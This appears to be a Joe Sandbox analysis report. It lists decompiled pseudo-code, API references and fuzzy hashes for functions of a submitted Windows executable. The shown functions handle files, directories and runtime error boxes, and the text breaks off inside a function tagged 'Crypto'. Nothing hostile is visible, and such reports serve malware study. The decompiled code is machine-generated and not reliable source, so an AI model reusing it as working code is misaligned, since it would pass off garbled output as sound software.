                              0x00405846
                              0x0040584b
                              0x0040584c
                              0x00405851
                              0x00405851
                              0x0040585c
                              0x00405866
                              0x00405871
                              0x00405879

                              APIs
                              • __EH_prolog.LIBCMT ref: 00405846
                                • Part of subcall function 004055DE: __EH_prolog.LIBCMT ref: 004055E3
                                • Part of subcall function 004055DE: FindFirstFileW.KERNELBASE(?,?), ref: 00405611
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FindH_prolog$CloseFileFirst
                              • String ID:
                              • API String ID: 2004497850-0
                              • Opcode ID: 220b4cbfc40620496b03372d3826f196b8ab05123004ed9f75f8387d5271fe3c
                              • Instruction ID: b7fde63f1f0c292b4e5d00ec8c3d5d27a79480d2707f186765d0e2b5b752fd38
                              • Opcode Fuzzy Hash: 220b4cbfc40620496b03372d3826f196b8ab05123004ed9f75f8387d5271fe3c
                              • Instruction Fuzzy Hash: 7CE04FB1951506ABCB14DF50CC52AEEB734FB1131CF10421EE021722D08B785648CA28
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405806 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E00405806(void* __ecx, void* __edx) {
				void* _t11;
				void* _t22;

				E00413954(E004196DC, _t22);
				_push(__ecx);
				 *(_t22 - 0x10) =  *(_t22 - 0x10) | 0xffffffff;
				_t3 = _t22 - 4;
				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
				_t11 = E0040553A(_t22 - 0x10,  *_t3,  *((intOrPtr*)(_t22 + 8)), __ecx); // executed
				E0040551A(_t22 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
				return _t11;
			}





                              0x0040580b
                              0x00405810
                              0x00405811
                              0x00405816
                              0x00405816
                              0x00405821
                              0x0040582b
                              0x00405836
                              0x0040583e

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040580B
                                • Part of subcall function 0040553A: FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirstH_prolog
                              • String ID:
                              • API String ID: 889498515-0
                              • Opcode ID: bc6002362a3e3570d7b7dbbff413248cb0e6e96336b5f812f3c621cb83c14948
                              • Instruction ID: 15a52a3ac40e1f9f01e416ae3406c700f8aec04b6379e90cb97043f6baa550c5
                              • Opcode Fuzzy Hash: bc6002362a3e3570d7b7dbbff413248cb0e6e96336b5f812f3c621cb83c14948
                              • Instruction Fuzzy Hash: 2AE01AB195150AAACB04DB50CC52AEEB760EB1131CF00421AA421722D0877856488A28
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040F8C3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                              Download Yara Rule
                              C-Code - Quality: 82%
                              			E0040F8C3(intOrPtr* __ecx, void* __eflags) {
				void* _t8;
				void* _t17;
				intOrPtr _t19;

				E00413954(E0041A808, _t17);
				_push(__ecx);
				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
				 *((intOrPtr*)(_t17 - 0x10)) = _t19;
				_t8 = E0040F648(__ecx, __eflags,  *((intOrPtr*)(_t17 + 8))); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t17 - 0xc));
				return _t8;
			}






                              0x0040f8c8
                              0x0040f8cd
                              0x0040f8ce
                              0x0040f8d5
                              0x0040f8db
                              0x0040f8f0
                              0x0040f8f9

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040F8C8
                                • Part of subcall function 0040F648: __EH_prolog.LIBCMT ref: 0040F64D
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: fd9f4e5796ff426001010c6032b0bd2709108ec26b7ef45d9eef3846ac2bdd07
                              • Instruction ID: 6b40bdca6a02cd8c303c1b1c800ac92429027f894e9b325ac65d5e69f4ab0667
                              • Opcode Fuzzy Hash: fd9f4e5796ff426001010c6032b0bd2709108ec26b7ef45d9eef3846ac2bdd07
                              • Instruction Fuzzy Hash: 0CD01272911104EBD711AB49D842BDEBB68EB8135DF10853BF00171550C37D56459569
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405B7B Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E00405B7B(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				signed int _t11;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t11 & 0xffffff00 | _t11 != 0x00000000;
			}





                              0x00405b7e
                              0x00405b85
                              0x00405b91
                              0x00405b9f
                              0x00405ba5

                              APIs
                              • ReadFile.KERNELBASE(000000FF,00000000,?,?,00000000,000000FF,?,00405BC6,00000000,?,00000000,?,00405BEC,00000000,?,00000000), ref: 00405B91
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: a0fa365660526cfbb9cae47ffd537a5a3e67cffdb1018a760807b9850e2f108c
                              • Instruction ID: c5e24743f6b433bb21cc94cc2971fe47eb8403274bd7f90fdb54931116458873
                              • Opcode Fuzzy Hash: a0fa365660526cfbb9cae47ffd537a5a3e67cffdb1018a760807b9850e2f108c
                              • Instruction Fuzzy Hash: 7EE0EC75241208FBCB01CF90CD01FCE7BB9EB49754F208058E90596160D375AA14EB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040551A Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040551A(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindClose(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                              0x0040551b
                              0x0040551d
                              0x00405522
                              0x00405536
                              0x00405539
                              0x00405524
                              0x00405525
                              0x0040552d
                              0x00405533
                              0x00000000
                              0x0040552f
                              0x00405532
                              0x00405532
                              0x0040552d

                              APIs
                              • FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CloseFind
                              • String ID:
                              • API String ID: 1863332320-0
                              • Opcode ID: a5f15e60ddec85d8ac06024adb1482cc35c18756887bd61c03bc9ed0d5cb4483
                              • Instruction ID: 986561ebb0227da743eeb2b9ec995cdcc659c9848a972ac8d271436d9e92df52
                              • Opcode Fuzzy Hash: a5f15e60ddec85d8ac06024adb1482cc35c18756887bd61c03bc9ed0d5cb4483
                              • Instruction Fuzzy Hash: 6BD0123150452166CF745E3C7C459C333D99A123B03660BAAF4B4D32E5D3748CC35AD4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405A63 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00405A63(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindCloseChangeNotification(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                              0x00405a64
                              0x00405a66
                              0x00405a6b
                              0x00405a7f
                              0x00405a82
                              0x00405a6d
                              0x00405a6e
                              0x00405a76
                              0x00405a7c
                              0x00000000
                              0x00405a78
                              0x00405a7b
                              0x00405a7b
                              0x00405a76

                              APIs
                              • FindCloseChangeNotification.KERNELBASE(00000000,?,00405A2C,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A6E
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: ChangeCloseFindNotification
                              • String ID:
                              • API String ID: 2591292051-0
                              • Opcode ID: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
                              • Instruction ID: 8a38a6d9813b312501c47e0c29c9a2f8cf12ac5fa7676fc4773f80372e0f1af5
                              • Opcode Fuzzy Hash: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
                              • Instruction Fuzzy Hash: 5CD0C93160462146CA645E3C7C849D737D89A16330325176AF0B5D22E4D3748D875E94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00404BDC Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00404BDC(CHAR* __ecx, void* __eflags) {
				void* _t3;
				signed int _t4;

				_t3 = E0040489C(__ecx, 0);
				if(_t3 != 0) {
					_t4 = DeleteFileA(__ecx); // executed
					return _t4 & 0xffffff00 | _t4 != 0x00000000;
				} else {
					return _t3;
				}
			}





                              0x00404be1
                              0x00404be8
                              0x00404bed
                              0x00404bf9
                              0x00404beb
                              0x00404beb
                              0x00404beb

                              APIs
                                • Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                              • DeleteFileA.KERNELBASE(?,?,00404DBF,?,00000000,?,?,?,?,?,00000000), ref: 00404BED
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: File$AttributesDelete
                              • String ID:
                              • API String ID: 2910425767-0
                              • Opcode ID: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
                              • Instruction ID: 9a45e8f854b003a178289988cc7fc064ae5902da4cc88310474d582750e90668
                              • Opcode Fuzzy Hash: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
                              • Instruction Fuzzy Hash: 0BC08C26209231439A043ABA3805ACB171E0EC122030AC0BBB800A2059CB288DC221DC
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405C5A Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 58%
                              			E00405C5A(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
				signed int _t4;

				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}




                              0x00405c68
                              0x00405c70
                              0x00405c74

                              APIs
                              • SetFileTime.KERNELBASE(?,?,?,?,00405C84,00000000,00000000,?,00402E12,?), ref: 00405C68
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FileTime
                              • String ID:
                              • API String ID: 1425588814-0
                              • Opcode ID: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
                              • Instruction ID: 87fe90df0bd66b56430cb58ce5188ab21e49bedd0782b4bf3c7b48ca6ef22eff
                              • Opcode Fuzzy Hash: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
                              • Instruction Fuzzy Hash: 8EC04C36158105FF8F020F70CC04C5EBFA2EB99711F10C918B269C40B0C7328024EB02
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040489C Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040489C(CHAR* __ecx, long __edx) {
				signed int _t3;

				_t3 = SetFileAttributesA(__ecx, __edx); // executed
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                              0x0040489e
                              0x004048a9

                              APIs
                              • SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
                              • Instruction ID: c0231da6564a4fbd22ddd4f059f5cfeb57e5ba4ab4dd36146b68eeddd1056acd
                              • Opcode Fuzzy Hash: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
                              • Instruction Fuzzy Hash: 5BA002A03112059BA6145B315E0AB6F296DEDC9AE1705C56C7412C5060EB29C9505565
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040498D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040498D(CHAR* __ecx) {
				signed int _t3;

				_t3 = CreateDirectoryA(__ecx, 0); // executed
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                              0x00404990
                              0x0040499b

                              APIs
                              • CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CreateDirectory
                              • String ID:
                              • API String ID: 4241100979-0
                              • Opcode ID: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
                              • Instruction ID: 18df801fa9cda183c38834b8287032c54ef98b8f5de1dc60049a64e9909c76fe
                              • Opcode Fuzzy Hash: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
                              • Instruction Fuzzy Hash: DCA0223030030283E2200F320E0AB0F280CAF08AC0F00C02C3000C80E0FB28C000008C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004048AA Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004048AA(CHAR* __ecx) {
				signed int _t3;

				_t3 = RemoveDirectoryA(__ecx); // executed
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                              0x004048ab
                              0x004048b6

                              APIs
                              • RemoveDirectoryA.KERNELBASE(?,00404D27,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 004048AB
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: DirectoryRemove
                              • String ID:
                              • API String ID: 597925465-0
                              • Opcode ID: 5eb19e86367385bc71ec08970d66f6ec81c8b6c1d5f16cf833c81eadf1f07443
                              • Instruction ID: 8a2519b774f471bade5b05e48f192836a719b77eeaa2736f11b150acbb720719
                              • Opcode Fuzzy Hash: 5eb19e86367385bc71ec08970d66f6ec81c8b6c1d5f16cf833c81eadf1f07443
                              • Instruction Fuzzy Hash: E7A002603112058796241B315F0968F295D9D455D1706C5696516C4060DB29C5505555
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 00418320 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 46%
                              			E00418320(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x423514 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x423518; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x42351c; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x423514(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x423514 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x423518 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x42351c = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}









                              0x00418321
                              0x00418323
                              0x0041832b
                              0x0041836f
                              0x0041836f
                              0x00418376
                              0x0041837a
                              0x0041837e
                              0x00418380
                              0x00418387
                              0x0041838c
                              0x0041838c
                              0x00418387
                              0x0041837e
                              0x00000000
                              0x0041839b
                              0x00418338
                              0x0041833c
                              0x004183a5
                              0x00000000
                              0x004183a5
                              0x0041834a
                              0x0041834e
                              0x00418353
                              0x00000000
                              0x00418355
                              0x00418363
                              0x0041836a
                              0x00000000
                              0x0041836a

                              APIs
                              • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,0041795A,?,Microsoft Visual C++ Runtime Library,00012010,?,0041BD2C,?,0041BD7C,?,?,?,Runtime Error!Program: ), ref: 00418332
                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041834A
                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0041835B
                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00418368
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                              • API String ID: 2238633743-4044615076
                              • Opcode ID: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
                              • Instruction ID: e87ed1bb16eb8be6f8b96595097180185a60ce52c98033cfd4ddfb8cddd90555
                              • Opcode Fuzzy Hash: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
                              • Instruction Fuzzy Hash: C50179713002057F87209FB59C80A9B7AF4EB44B45318003EB558C3251DB6DCFC29BE9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040E5A5 Relevance: 1.7, APIs: 1, Instructions: 246COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 99%
                              			E0040E5A5(intOrPtr __ecx, signed int __edx) {
				signed int _t133;
				intOrPtr _t135;
				signed int _t136;
				signed int _t137;
				signed int _t148;
				intOrPtr _t159;
				signed int _t160;
				intOrPtr _t162;
				void* _t164;
				signed int _t167;
				intOrPtr _t175;
				signed int _t177;
				signed int _t183;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t201;
				signed int _t211;
				signed int _t214;
				signed int _t215;
				intOrPtr _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				signed int _t223;
				signed int _t225;
				void* _t226;

				_t211 = __edx;
				E00413954(E0041A690, _t226);
				_t175 = __ecx;
				 *((intOrPtr*)(_t226 - 0x14)) = __ecx;
				E004042D6();
				_t223 =  *(_t226 + 8);
				E00404327( *((intOrPtr*)(_t226 + 0xc)),  *(_t223 + 8));
				while(1) {
					_t133 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
					_t183 = _t211;
					 *(_t226 - 0x1c) = _t133;
					 *(_t226 - 0x18) = _t183;
					if(_t133 != 0xd) {
						goto L6;
					}
					L2:
					_t211 = 0;
					if(_t183 != 0) {
						L7:
						__eflags = _t133 - 0xa;
						if(_t133 != 0xa) {
							L9:
							__eflags = _t133 - 9;
							if(_t133 != 9) {
								L11:
								__eflags = _t133 | _t183;
								if((_t133 | _t183) == 0) {
									L13:
									_t135 =  *((intOrPtr*)(_t226 + 0xc));
									__eflags =  *((intOrPtr*)(_t135 + 8)) - _t211;
									if( *((intOrPtr*)(_t135 + 8)) != _t211) {
										L17:
										_t184 =  *((intOrPtr*)(_t226 + 0xc));
										_t214 = 0;
										 *(_t226 - 0x10) = 0;
										__eflags =  *((intOrPtr*)(_t184 + 8)) - _t211;
										if( *((intOrPtr*)(_t184 + 8)) <= _t211) {
											L27:
											__eflags =  *(_t226 - 0x1c) - 9;
											if( *(_t226 - 0x1c) == 9) {
